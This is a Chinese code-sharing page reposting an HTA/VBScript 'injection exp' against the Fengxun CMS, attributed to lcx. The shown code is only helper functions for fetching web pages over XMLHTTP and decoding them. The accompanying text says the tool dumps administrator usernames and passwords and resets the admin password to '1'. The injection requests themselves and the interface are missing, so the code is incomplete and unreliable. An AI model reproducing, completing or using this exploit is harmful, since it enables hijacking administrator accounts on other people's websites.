您现在的位置是:网站首页> 编程资料编程资料

风讯注入exp(hta版)代码发布_hta_

2023-05-25 288人已围观

简介 风讯注入exp(hta版)代码发布_hta_


Sub Window_onLoad
    window.resizeTo 450,380
    window.moveTo 300, 300
End Sub 



Function getHTTPPage(Path)
       t = GetBody(Path)
       getHTTPPage = BytesToBstr(t, "GB2312")
      document.getElementById("url").innerText=getHTTPPage
End Function


Function GetBody(url)
      On Error Resume Next
      Set Retrieval = CreateObject("Microsoft.XMLHTTP")
      With Retrieval
          .Open "Get", url, False, "", ""
          .Send
           GetBody = .ResponseBody
      End With
      Set Retrieval = Nothing
End Function

Function BytesToBstr(Body, Cset)
      Dim objstream
      Set objstream = CreateObject("adodb.stream")
       objstream.Type = 1
       objstream.Mode = 3
       objstream.Open
       objstream.Write Body
       objstream.Position = 0
       objstream.Type = 2
       objstream.Charset = Cset
       BytesToBstr = objstream.ReadText
       objstream.Close
      Set objstream = Nothing
End Function



by lcx


风讯sql版注入,至于其它备份shell的语句懒得写了
暴管理员密码
暴管理员用户名
更改管理员密码为1


-六神源码网